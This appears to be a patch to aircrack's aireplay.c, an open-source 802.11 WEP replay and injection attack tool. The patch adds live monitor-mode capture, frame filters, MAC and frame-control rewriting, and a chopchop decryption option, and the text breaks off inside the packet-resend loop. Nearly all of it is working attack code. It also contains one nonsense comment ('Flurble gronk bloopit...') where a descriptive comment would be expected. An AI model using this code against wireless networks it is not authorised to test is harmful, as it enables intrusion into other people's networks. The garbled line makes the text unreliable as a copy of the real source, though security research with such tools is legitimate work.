--- /dev/null
+diff -urN aircrack-2.1.orig/aireplay.c aircrack-2.1/aireplay.c
+--- aircrack-2.1.orig/aireplay.c 2004-10-01 21:30:00.000000000 +0200
++++ aircrack-2.1/aireplay.c 2005-04-22 08:51:21.932065120 +0200
+@@ -1,7 +1,9 @@
+ /*
+- * 802.11 WEP arp-requests replay attack
++ * 802.11 WEP replay & injection attacks
+ *
+- * Copyright (C) 2004 Christophe Devine
++ * Copyright (C) 2004,2005 Christophe Devine
++ *
++ * WEP decryption attack (chopchop) developped by KoreK
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+@@ -18,41 +20,105 @@
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
+ */
+
++#include <sys/types.h>
+ #include <netpacket/packet.h>
++#include <linux/rtc.h>
+ #include <sys/ioctl.h>
++#include <sys/wait.h>
++#include <sys/stat.h>
+ #include <arpa/inet.h>
++#include <pthread.h>
+ #include <net/if.h>
+ #include <unistd.h>
+ #include <signal.h>
+ #include <string.h>
+ #include <stdlib.h>
+ #include <stdio.h>
++#include <fcntl.h>
++#include <errno.h>
+ #include <time.h>
+
+-#include "pcap.h"
++#include "pcap-aireplay.h"
++#include "crctable.h"
++
++#define NULL_MAC "\x00\x00\x00\x00\x00\x00"
+
+ #ifndef ETH_P_ALL
+ #define ETH_P_ALL 3
+ #endif
+
+-#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF"
++#ifndef ETH_P_80211_RAW
++#define ETH_P_80211_RAW 25
++#endif
++
++#ifndef ARPHRD_IEEE80211
++#define ARPHRD_IEEE80211 801
++#endif
++
++#ifndef ARPHRD_IEEE80211_PRISM
++#define ARPHRD_IEEE80211_PRISM 802
++#endif
+
+ char usage[] =
+
+ "\n"
+-" aireplay 2.1 - (C) 2004 Christophe Devine\n"
++" aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
++"\n"
++" usage: aireplay [options] <interface #0> [interface #1]\n"
+ "\n"
+-" usage: aireplay <wifi interface> <input filename> [bssid]\n"
++" interface #0 is for sending packets; it is also used to\n"
++" capture packets unless interface #1 is specified.\n"
++"\n"
++" source options:\n"
++"\n"
++" -i : capture packet on-the-fly (default)\n"
++" -r file : extract packet from this pcap file\n"
++"\n"
++" filter options:\n"
++"\n"
++" -b bssid : MAC address, Access Point\n"
++" -d dmac : MAC address, Destination\n"
++" -s smac : MAC address, Source\n"
++" -m len : minimum packet length, default: 40\n"
++" -n len : maximum packet length, default: 512\n"
++" -u type : fc, type - default: 2 = data\n"
++" -v subt : fc, subtype - default: 0 = normal\n"
++" -t tods : fc, To DS bit - default: any\n"
++" -f fromds : fc, From DS bit - default: any\n"
++" -w iswep : fc, WEP bit - default: 1\n"
++" -y : assume yes & don't save packet\n"
++"\n"
++" replay options:\n"
++"\n"
++" -x nbpps : number of packets per second\n"
++" -a bssid : set Access Point MAC address\n"
++" -c dmac : set Destination MAC address\n"
++" -h smac : set Source MAC address\n"
++" -o fc0 : set frame control[0] (hex)\n"
++" -p fc1 : set frame control[1] (hex)\n"
++" -k : turn chopchop attack on\n"
+ "\n";
+
+-unsigned char buffer[65536];
+-
+-struct __packet
++struct options
+ {
+- unsigned int length;
+- unsigned char *data;
+-}
+-arp_packets[4096];
++ unsigned char *s_file;
++
++ unsigned char f_bssid[6];
++ unsigned char f_smac[6];
++ unsigned char f_dmac[6];
++ int f_minlen, f_maxlen;
++ int f_type, f_subtype;
++ int f_fromds, f_tods, f_iswep;
++ int assume_yes;
++
++ unsigned char r_bssid[6];
++ unsigned char r_smac[6];
++ unsigned char r_dmac[6];
++ int r_fc_0, r_fc_1;
++ int nbpps, do_chopchop;
++};
++
++char *wlanng_dev = NULL;
+
+ int do_exit = 0;
+
+@@ -60,295 +126,1370 @@
+ {
+ if( signum == SIGINT || signum == SIGTERM )
+ do_exit = 1;
++
++ if( signum == SIGALRM )
++ do_exit = 2;
+ }
+
+-int main( int argc, char *argv[] )
++/* CRC checksum verification routine */
++
++int check_crc_buf( unsigned char *buf, int len )
+ {
+- FILE *f_cap;
++ unsigned long crc = 0xFFFFFFFF;
+
+- char *s;
+- int bssid_set;
+- long cnt1, cnt2;
+- int i, n, raw_sock;
+- unsigned char *h80211;
+- unsigned char bssid[6];
++ for( ; len > 0; len--, buf++ )
++ crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );
++
++ return( ~crc == *((unsigned long *) buf) );
++}
++
++/* MAC address parsing routine */
++
++int getmac( char *s, unsigned char *mac )
++{
++ int i = 0, n;
++
++ while( sscanf( s, "%x", &n ) == 1 )
++ {
++ if( n < 0 || n > 255 )
++ return( 1 );
++
++ mac[i] = n;
+
++ if( ++i == 6 ) break;
++
++ if( ! ( s = strchr( s, ':' ) ) )
++ break;
++
++ s++;
++ }
++
++ return( i != 6 );
++}
++
++/* interface initialization routine */
++
++int openraw( char *iface, int fd, int *arptype )
++{
+ struct ifreq ifr;
++ struct packet_mreq mr;
+ struct sockaddr_ll sll;
+- struct pcap_file_header pfh;
+- struct pcap_pkthdr pkh;
+- time_t tm_prev;
++
++ /* find the interface index */
+
+- /* create the raw socket */
++ memset( &ifr, 0, sizeof( ifr ) );
++ strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );
+
+- if( ( raw_sock = socket( PF_PACKET, SOCK_RAW,
+- htons( ETH_P_ALL ) ) ) < 0 )
++ if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
+ {
+- perror( "socket(PF_PACKET)" );
++ perror( "ioctl(SIOCGIFINDEX)" );
+ return( 1 );
+ }
+
+- /* drop privileges */
++ /* bind the raw socket to the interface */
+
+- setuid( getuid() );
++ memset( &sll, 0, sizeof( sll ) );
++ sll.sll_family = AF_PACKET;
++ sll.sll_ifindex = ifr.ifr_ifindex;
++ if( wlanng_dev )
++ sll.sll_protocol = htons( ETH_P_80211_RAW );
++ else
++ sll.sll_protocol = htons( ETH_P_ALL );
+
+- /* check the arguments */
++ if( bind( fd, (struct sockaddr *) &sll,
++ sizeof( sll ) ) < 0 )
++ {
++ perror( "bind(ETH_P_ALL)" );
++ return( 1 );
++ }
++
++ /* lookup the hardware type */
+
+- if( argc < 3 || argc > 4 )
++ if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
+ {
+- usage:
+- printf( usage );
++ perror( "ioctl(SIOCGIFHWADDR)" );
+ return( 1 );
+ }
+
+- bssid_set = 0;
++ if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
++ ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM )
++ {
++ fprintf( stderr, "unsupported hardware link type %d\n"
++ "(expected ARPHRD_IEEE80211{,PRISM})\n",
++ ifr.ifr_hwaddr.sa_family );
++ fprintf( stderr, "make sure the interface is in Monitor mode\n" );
++ return( 1 );
++ }
++
++ *arptype = ifr.ifr_hwaddr.sa_family;
++
++ /* enable promiscuous mode */
+
+- if( argc == 4 )
++ memset( &mr, 0, sizeof( mr ) );
++ mr.mr_ifindex = sll.sll_ifindex;
++ mr.mr_type = PACKET_MR_PROMISC;
++
++ if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
++ &mr, sizeof( mr ) ) < 0 )
+ {
+- i = 0;
+- s = optarg;
++ perror( "setsockopt(PACKET_MR_PROMISC)" );
++ return( 1 );
++ }
+
+- while( sscanf( s, "%x", &n ) == 1 )
+- {
+- if( n < 0 || n > 255 )
+- goto usage;
++ return( 0 );
++}
++
++/* wlanng-aware frame sending routing */
++
++unsigned char tmpbuf[4096];
+
+- bssid[i] = n;
++int send_frame( int fd, void *buf, size_t count )
++{
++ if( wlanng_dev )
++ {
++ if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
++ {
++ memcpy( tmpbuf, buf, 24 );
++ memset( tmpbuf + 24, 0, 22 );
+
+- if( ++i == 6 ) break;
++ tmpbuf[30] = ( count - 24 ) & 0xFF;
++ tmpbuf[31] = ( count - 24 ) >> 8;
+
+- if( ! ( s = strchr( s, ':' ) ) )
+- break;
++ memcpy( tmpbuf + 46, buf + 24, count - 24 );
+
+- s++;
++ count += 22;
+ }
++ else
++ {
++ memcpy( tmpbuf, buf, 30 );
++ memset( tmpbuf + 30, 0, 16 );
++
++ tmpbuf[30] = ( count - 30 ) & 0xFF;
++ tmpbuf[31] = ( count - 30 ) >> 8;
+
+- if( i != 6 ) goto usage;
++ memcpy( tmpbuf + 46, buf + 30, count - 30 );
++
++ count += 16;
++ }
+
+- bssid_set = 1;
++ buf = tmpbuf;
+ }
+
+- if( argc - optind != 2 )
+- goto usage;
++ return( write( fd, buf, count ) < 0 );
++}
++
++int main( int argc, char *argv[] )
++{
++ time_t tt;
++ int i, j, n, z;
++ int fd_rtc, caplen;
++ int fd_in, arptype_in;
++ int fd_out, arptype_out;
++ int i_bssid, i_smac, i_dmac;
++ int data_start, data_end;
++ int guess, is_deauth_mode;
++
++ unsigned long ticks[4];
++ unsigned long crc_mask;
++ unsigned long nb_pkt_read;
++ unsigned long nb_pkt_sent;
++
++ char tmp_str[256];
++
++ unsigned char buffer[4096];
++ unsigned char *h80211;
++ unsigned char *savebuf;
++ unsigned char *chopped;
++
++ FILE *f_cap_in = NULL;
++ FILE *f_cap_out = NULL;
++
++ struct tm *lt;
++ struct timeval tv;
++ struct options opt;
++ struct pcap_file_header pfh;
++ struct pcap_pkthdr pkh;
+
+- if( strcmp( argv[optind], "wlan0ap" ) &&
+- strcmp( argv[optind], "wlan1ap" ) &&
+- strcmp( argv[optind], "wlan2ap" ) )
++ fd_set rfds;
++
++ /* create i/o raw sockets and open /dev/rtc */
++
++ if( ( fd_in = socket( PF_PACKET, SOCK_RAW,
++ htons( ETH_P_ALL ) ) ) < 0 )
+ {
+- fprintf( stderr, "This program only works with HostAP's "
+- "wlan#ap interface.\n" );
++ perror( "socket(PF_PACKET)" );
+ return( 1 );
+ }
+
+- /* open the input file and check the pcap header */
+-
+- if( ( f_cap = fopen( argv[optind + 1], "rb" ) ) == NULL )
++ if( ( fd_out = socket( PF_PACKET, SOCK_RAW,
++ htons( ETH_P_ALL ) ) ) < 0 )
+ {
+- perror( "open" );
++ perror( "socket(PF_PACKET)" );
+ return( 1 );
+ }
+
+- n = sizeof( struct pcap_file_header );
+-
+- if( fread( &pfh, 1, n, f_cap ) != (size_t) n )
++ if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 )
+ {
+- perror( "read(pcap header)" );
++ perror( "open(/dev/rtc)" );
+ return( 1 );
+ }
+
+- if( pfh.magic != TCPDUMP_MAGIC )
++ if( ioctl( fd_rtc, RTC_IRQP_SET, 4096 ) < 0 )
+ {
+- fprintf( stderr, "wrong magic from pcap file header\n"
+- "(got 0x%08X, expected 0x%08X)\n",
+- pfh.magic, TCPDUMP_MAGIC );
++ perror( "ioctl(RTC_IRQP_SET)" );
++ printf( "Make sure you have enhanced rtc support in your kernel\n"
++ "(module rtc) and that CONFIG_HPET_RTC_IRQ is disabled.\n" );
+ return( 1 );
+ }
+
+- if( pfh.linktype != LINKTYPE_IEEE802_11 &&
+- pfh.linktype != LINKTYPE_PRISM_HEADER )
++ if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 )
+ {
+- fprintf( stderr, "unsupported pcap header linktype %d\n",
+- pfh.linktype );
++ perror( "ioctl(RTC_PIE_ON)" );
+ return( 1 );
+ }
+
+- /* find the interface index */
++ /* drop privileges */
+
+- memset( &ifr, 0, sizeof( ifr ) );
+- strncpy( ifr.ifr_name, argv[optind], sizeof( ifr.ifr_name ) - 1 );
++ setuid( getuid() );
++
++ /* check the arguments */
++
++ memset( &opt, 0, sizeof( opt ) );
++
++ opt.f_minlen = 40;
++ opt.f_maxlen = 512;
++ opt.f_type = 2;
++ opt.f_subtype = 0;
++ opt.f_tods = -1;
++ opt.f_fromds = -1;
++ opt.f_iswep = 1;
++ opt.r_fc_0 = -1;
++ opt.r_fc_1 = -1;
+
+- if( ioctl( raw_sock, SIOCGIFINDEX, &ifr ) < 0 )
++ while( 1 )
+ {
+- perror( "ioctl(SIOCGIFINDEX)" );
+- return( 1 );
++ int option = getopt( argc, argv,
++ "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" );
++
++ if( option < 0 ) break;
++
++ switch( option )
++ {
++ case 'i' : break;
++
++ case 'r' : if( opt.s_file != NULL )
++ {
++ printf( "Packet source file already specified.\n" );
++ return( 1 );
++ }
++ opt.s_file = optarg;
++ break;
++
++ case 'b' : if( getmac( optarg, opt.f_bssid ) != 0 )
++ {
++ printf( "Invalid AP MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'd' : if( getmac( optarg, opt.f_dmac ) != 0 )
++ {
++ printf( "Invalid destination MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 's' : if( getmac( optarg, opt.f_smac ) != 0 )
++ {
++ printf( "Invalid source MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'm' : sscanf( optarg, "%d", &opt.f_minlen );
++ if( opt.f_minlen < 0 )
++ {
++ printf( "Invalid minimum length filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'n' : sscanf( optarg, "%d", &opt.f_maxlen );
++ if( opt.f_maxlen < 0 )
++ {
++ printf( "Invalid maximum length filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'u' : sscanf( optarg, "%d", &opt.f_type );
++ if( opt.f_type < 0 || opt.f_type > 3 )
++ {
++ printf( "Invalid type filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'v' : sscanf( optarg, "%d", &opt.f_subtype );
++ if( opt.f_subtype < 0 || opt.f_subtype > 15 )
++ {
++ printf( "Invalid subtype filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 't' : sscanf( optarg, "%d", &opt.f_tods );
++ if( opt.f_tods != 0 && opt.f_tods != 1 )
++ {
++ printf( "Invalid tods filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'f' : sscanf( optarg, "%d", &opt.f_fromds );
++ if( opt.f_fromds != 0 && opt.f_fromds != 1 )
++ {
++ printf( "Invalid fromds filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'w' : sscanf( optarg, "%d", &opt.f_iswep );
++ if( opt.f_iswep != 0 && opt.f_iswep != 1 )
++ {
++ printf( "Invalid wep filter.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'y' : opt.assume_yes = 1; break;
++
++ case 'x' : sscanf( optarg, "%d", &opt.nbpps );
++ if( opt.nbpps < 1 || opt.nbpps > 4096 )
++ {
++ printf( "Invalid number of packets per second.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'a' : if( getmac( optarg, opt.r_bssid ) != 0 )
++ {
++ printf( "Invalid AP MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'c' : if( getmac( optarg, opt.r_dmac ) != 0 )
++ {
++ printf( "Invalid destination MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'h' : if( getmac( optarg, opt.r_smac ) != 0 )
++ {
++ printf( "Invalid source MAC address.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'o' : sscanf( optarg, "%x", &opt.r_fc_0 );
++ if( opt.r_fc_0 < 0 || opt.r_fc_0 > 255 )
++ {
++ printf( "Invalid frame control byte #0.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'p' : sscanf( optarg, "%x", &opt.r_fc_1 );
++ if( opt.r_fc_1 < 0 || opt.r_fc_1 > 255 )
++ {
++ printf( "Invalid frame control byte #1.\n" );
++ return( 1 );
++ }
++ break;
++
++ case 'k' : opt.do_chopchop = 1; break;
++
++ default : goto usage; break;
++ }
+ }
+
+- /* bind the raw socket to the interface */
++ if( argc - optind < 1 || argc - optind > 2 )
++ {
++ usage:
++ printf( usage );
++ return( 1 );
++ }
+
+- memset( &sll, 0, sizeof( sll ) );
+- sll.sll_family = AF_PACKET;
+- sll.sll_ifindex = ifr.ifr_ifindex;
+- sll.sll_protocol = htons( ETH_P_ALL );
++ if( opt.f_minlen > opt.f_maxlen )
++ {
++ printf( "Invalid length filter (%d > %d).\n",
++ opt.f_minlen, opt.f_maxlen );
++ return( 1 );
++ }
+
+- if( bind( raw_sock, (struct sockaddr *) &sll,
+- sizeof( sll ) ) < 0 )
++ if( opt.nbpps == 0 )
+ {
+- perror( "bind(ETH_P_ALL)" );
++ opt.nbpps = 256;
++ printf( "Option -x not specified, assuming %d.\n",
++ opt.nbpps );
++ }
++
++ if( memcmp( argv[optind], "wlan", 4 ) == 0 )
++ wlanng_dev = argv[optind];
++
++ if( openraw( argv[optind], fd_out, &arptype_out ) != 0 )
+ return( 1 );
++
++ /* open the packet source */
++
++ if( argc - optind == 2 )
++ {
++ if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 )
++ return( 1 );
++ }
++ else
++ {
++ fd_in = fd_out;
++ arptype_in = arptype_out;
++ }
++
++ if( opt.s_file != NULL )
++ {
++ if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) )
++ {
++ perror( "open" );
++ return( 1 );
++ }
++
++ n = sizeof( struct pcap_file_header );
++
++ if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n )
++ {
++ perror( "fread(pcap file header)" );
++ return( 1 );
++ }
++
++ if( pfh.magic != TCPDUMP_MAGIC &&
++ pfh.magic != TCPDUMP_CIGAM )
++ {
++ fprintf( stderr, "wrong magic from pcap file header\n" );
++ return( 1 );
++ }
++
++ if( pfh.magic == TCPDUMP_CIGAM )
++ SWAP32(pfh.linktype);
++
++ if( pfh.linktype != LINKTYPE_IEEE802_11 &&
++ pfh.linktype != LINKTYPE_PRISM_HEADER )
++ {
++ fprintf( stderr, "'%s' is not a 802.11 capture file.\n",
++ opt.s_file );
++ return( 1 );
++ }
+ }
+
+- signal( SIGINT, sighandler );
++ /* look for replay-able packets */
+
+- tm_prev = time( NULL );
++ signal( SIGINT, sighandler );
++ signal( SIGTERM, sighandler );
+
+- cnt1 = cnt2 = 0;
++ nb_pkt_read = 0;
+
+- /* search for potentially usable packets */
++ tt = time( NULL );
+
+ while( 1 )
+ {
+- if( do_exit ) break;
++ if( do_exit )
++ {
++ printf( "exiting.\n" );
++ return( 1 );
++ }
+
+- if( time( NULL ) - tm_prev >= 1 )
++ if( time( NULL ) - tt >= 1 )
+ {
+- tm_prev = time( NULL );
+- printf( "\r\33[1KRead %ld packets, got %ld "
+- "potential ARP packets\r", cnt1, cnt2 );
++ tt = time( NULL );
++ printf( "\rSeen %ld packets...\33[K", nb_pkt_read );
+ fflush( stdout );
+ }
+
+- /* read one packet */
++ caplen = 0;
+
+- n = sizeof( pkh );
++ if( opt.s_file == NULL )
++ {
++ /* capture one packet */
+
+- if( fread( &pkh, 1, n, f_cap ) != (size_t) n )
+- break;
++ FD_ZERO( &rfds );
++ FD_SET( fd_in, &rfds );
+
+- if( pkh.len != pkh.caplen )
+- continue;
++ tv.tv_sec = 1;
++ tv.tv_usec = 0;
+
+- n = pkh.caplen;
++ if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 )
++ {
++ if( errno == EINTR ) continue;
++ perror( "select" );
++ return( 1 );
++ }
+
+- if( fread( buffer, 1, n, f_cap ) != (size_t) n )
+- break;
++ if( ! FD_ISSET( fd_in, &rfds ) )
++ continue;
+
+- cnt1++;
++ /* one packet available for reading */
+
+- h80211 = buffer;
++ gettimeofday( &tv, NULL );
++
++ memset( buffer, 0, 2048 );
+
+- if( pfh.linktype == LINKTYPE_PRISM_HEADER )
++ if( ( caplen = read( fd_in, buffer,
++ sizeof( buffer ) ) ) < 0 )
++ {
++ perror( "read" );
++ return( 1 );
++ }
++
++ /* if device is an atheros, remove the FCS */
++
++ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
++ caplen -= 4;
++ }
++ else
+ {
+- /* remove the prism header if necessary */
++ /* read one packet */
+
+- n = *(int *)( h80211 + 4 );
++ n = sizeof( pkh );
+
+- if( n < 8 || n >= (int) pkh.len )
++ if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n )
++ {
++ printf( "\rSeen %ld packets...EOF.\n",
++ nb_pkt_read );
++ return( 1 );
++ }
++
++ if( pfh.magic == TCPDUMP_CIGAM )
++ SWAP32( pkh.caplen );
++
++ n = caplen = pkh.caplen;
++
++ if( fread( buffer, 1, n, f_cap_in ) != (size_t) n )
++ {
++ printf( "\rSeen %ld packets...EOF.\n",
++ nb_pkt_read );
++ return( 1 );
++ }
++ }
++
++ nb_pkt_read++;
++
++ /* skip the prism header if present */
++
++ h80211 = buffer;
++
++ if( ( opt.s_file == NULL && arptype_in == ARPHRD_IEEE80211_PRISM ) ||
++ ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER ) )
++ {
++ n = *(int *)( buffer + 4 );
++
++ if( n < 8 || n >= (int) caplen )
+ continue;
+
+- h80211 += n; pkh.len -= n;
++ h80211 += n;
++ caplen -= n;
+ }
+
+- /* check if it's an encrypted data packet */
++ /* check length */
++
++ if( caplen < opt.f_minlen ||
++ caplen > opt.f_maxlen ) continue;
+
+- if( pkh.len < 40 ) continue;
++ /* check the frame control bytes */
+
+- if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
+- if( ( h80211[1] & 0x40 ) != 0x40 ) continue;
++ if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
++ opt.f_type >= 0 ) continue;
+
+- /* also check the BSSID and KeyID */
++ if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) &&
++ opt.f_subtype >= 0 ) continue;
++
++ if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
++ opt.f_tods >= 0 ) continue;
++
++ if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
++ opt.f_fromds >= 0 ) continue;
++
++ if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
++ opt.f_iswep >= 0 ) continue;
++
++ /* check the extended IV (TKIP) flag */
++
++ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
++
++ if( opt.f_type == 2 && opt.f_iswep == 1 &&
++ ( h80211[z + 3] & 0x20 ) != 0 ) continue;
++
++ /* MAC address checking */
+
+ switch( h80211[1] & 3 )
+ {
+- case 0: i = 16; break; /* DA, SA, (BSSID) */
+- case 1: i = 4; break; /* (BSSID), SA, DA */
+- case 2: i = 10; break; /* DA, (BSSID), SA */
+- default: i = 4; break; /* (RA), TA, DA, SA */
++ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
++ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
++ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
++ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
+ }
+
+- if( bssid_set == 0 )
++ if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
++ if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 )
++ continue;
++
++ if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
++ if( memcmp( h80211 + i_smac, opt.f_smac, 6 ) != 0 )
++ continue;
++
++ if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
++ if( memcmp( h80211 + i_dmac, opt.f_dmac, 6 ) != 0 )
++ continue;
++
++ /* this one looks good */
++
++ printf( "\n\n Size: %d, FromDS: %d, ToDS: %d\n",
++ caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
++ printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
++ h80211[i_bssid ], h80211[i_bssid + 1],
++ h80211[i_bssid + 2], h80211[i_bssid + 3],
++ h80211[i_bssid + 4], h80211[i_bssid + 5] );
++ printf( " Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
++ h80211[i_smac ], h80211[i_smac + 1],
++ h80211[i_smac + 2], h80211[i_smac + 3],
++ h80211[i_smac + 4], h80211[i_smac + 5] );
++ printf( " Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
++ h80211[i_dmac ], h80211[i_dmac + 1],
++ h80211[i_dmac + 2], h80211[i_dmac + 3],
++ h80211[i_dmac + 4], h80211[i_dmac + 5] );
++
++ /* Flurble gronk bloopit, bnip Frundletrune! */
++
++ for( i = 0; i < caplen; i++ )
+ {
+- bssid_set = 1;
++ if( ( i & 15 ) == 0 )
++ {
++ if( i == 256 )
++ {
++ printf( "\n --- CUT ---" );
++ break;
++ }
++
++ printf( "\n 0x%04x: ", i );
++ }
+
+- memcpy( bssid, h80211 + i, 6 );
++ printf( "%02x", h80211[i] );
++
++ if( ( i & 1 ) != 0 )
++ printf( " " );
++
++ if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
++ {
++ for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
++ {
++ printf( " " );
++ if( ( j & 1 ) != 0 )
++ printf( " " );
++ }
++
++ printf( " " );
++
++ for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
++ printf( "%c", ( h80211[i - 15 + j] < 32 ||
++ h80211[i - 15 + j] > 126 )
++ ? '.' : h80211[i - 15 + j] );
++ }
+
+- printf( "\33[2KChoosing first encrypted BSSID"
+- " = %02X:%02X:%02X:%02X:%02X:%02X\n",
+- bssid[0], bssid[1], bssid[2],
+- bssid[3], bssid[4], bssid[5] );
++ if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
++ {
++ printf( " " );
++
++ for( j = 0; j < 16; j++ )
++ printf( "%c", ( h80211[i - 15 + j] < 32 ||
++ h80211[i - 15 + j] > 127 )
++ ? '.' : h80211[i - 15 + j] );
++ }
+ }
+- else
+- if( memcmp( bssid, h80211 + i, 6 ) )
+- continue;
+
+- /* finally check the packet length & broadcast address */
++ printf( "\n\n" );
+
+- switch( h80211[1] & 3 )
++ if( opt.assume_yes )
++ break;
++
++ printf( "Use this packet ? " );
++
++ fflush( stdout );
++ signal( SIGINT, SIG_DFL );
++ scanf( "%s", tmp_str );
++ signal( SIGINT, sighandler );
++ printf( "\n" );
++
++ if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' )
++ break;
++ }
++
++ /* save the selected packet */
++
++ pfh.magic = TCPDUMP_MAGIC;
++ pfh.version_major = PCAP_VERSION_MAJOR;
++ pfh.version_minor = PCAP_VERSION_MINOR;
++ pfh.thiszone = 0;
++ pfh.sigfigs = 0;
++ pfh.snaplen = 65535;
++ pfh.linktype = LINKTYPE_IEEE802_11;
++
++ pkh.tv_sec = tv.tv_sec;
++ pkh.tv_usec = tv.tv_usec;
++ pkh.caplen = caplen;
++ pkh.len = caplen;
++
++ lt = localtime( &tv.tv_sec );
++
++ if( ! opt.assume_yes )
++ {
++ sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap",
++ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
++ lt->tm_hour, lt->tm_min, lt->tm_sec );
++
++ printf( "Saving chosen packet in %s\n\n", tmp_str );
++
++ n = sizeof( struct pcap_file_header );
++
++ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
+ {
+- case 0: i = 4; break; /* (DA), SA, BSSID */
+- case 1: i = 16; break; /* BSSID, SA, (DA) */
+- case 2: i = 4; break; /* (DA), BSSID, SA */
+- default: i = 16; break; /* RA, TA, (DA), SA */
++ perror( "fopen(pcap output,wb+)" );
++ return( 1 );
+ }
+
+- if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 ||
+- memcmp( h80211 + i, BROADCAST_ADDR, 6 ) )
+- continue;
++ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(pcap file header)\n" );
++ return( 1 );
++ }
+
+- /* ok, this packet may be replayed */
++ n = sizeof( pkh );
+
+- arp_packets[cnt2].length = pkh.len;
++ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
++ {
++ perror( "fwrite(packet header)" );
++ return( 1 );
++ }
+
+- arp_packets[cnt2].data = (unsigned char *)
+- malloc( pkh.len );
++ n = pkh.caplen;
+
+- if( ! arp_packets[cnt2].data )
++ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
+ {
+- perror( "malloc" );
++ perror( "fwrite(packet data)" );
+ return( 1 );
+ }
++ }
+
+- memcpy( arp_packets[cnt2].data, buffer, pkh.len );
++ if( opt.do_chopchop ) goto do_chopchop;
+
+- if( cnt2++ >= (int) sizeof( arp_packets ) )
+- break;
++ /* rewrite MAC addresses & frame control */
++
++ if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0;
++ if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1;
++
++ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
++
++ switch( h80211[1] & 3 )
++ {
++ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
++ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
++ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
++ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
++ }
++
++ if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 )
++ memcpy( h80211 + i_bssid, opt.r_bssid, 6 );
++
++ if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 )
++ memcpy( h80211 + i_smac, opt.r_smac, 6 );
++
++ if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
++ memcpy( h80211 + i_dmac, opt.r_dmac, 6 );
++
++ /* standard operation mode: loop resending the packet */
++
++ memset( ticks, 0, sizeof( ticks ) );
++
++ nb_pkt_sent = 0;
++
++ while( 1 )
++ {
++ if( do_exit )
